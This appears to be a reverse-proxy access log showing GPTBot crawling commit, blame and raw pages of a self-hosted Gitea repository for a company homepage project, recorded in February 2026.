"https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:37:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:37:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508489] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692380] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:14:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429967] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641825] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:14:37:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498871] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:37:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699422] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" +[17/Feb/2026:14:37:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" +[17/Feb/2026:14:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/docker-compose.yml" +[17/Feb/2026:14:37:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" +[17/Feb/2026:14:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/metadata.json" +[17/Feb/2026:14:37:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" +[17/Feb/2026:14:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/status.json" +[17/Feb/2026:14:37:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" +[17/Feb/2026:14:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" +[17/Feb/2026:14:37:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/tsconfig.json" +[17/Feb/2026:14:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" +[17/Feb/2026:14:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/tsconfig.json" +[17/Feb/2026:14:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/assets/images" +[17/Feb/2026:14:38:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:38:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Contact.tsx" +[17/Feb/2026:14:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images" +[17/Feb/2026:14:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" +[17/Feb/2026:14:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" +[17/Feb/2026:14:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:14:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Services.tsx" +[17/Feb/2026:14:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" +[17/Feb/2026:14:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12972] [Gzip 4.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/types.ts" +[17/Feb/2026:14:38:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" +[17/Feb/2026:14:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 317084] [Gzip 14.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9951] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" +[17/Feb/2026:14:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15580] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:14:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13682] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Hero.tsx" +[17/Feb/2026:14:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14844] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:14:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14233] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:14:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 13958] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:14:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16507] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components" +[17/Feb/2026:14:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 46251] [Gzip 7.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 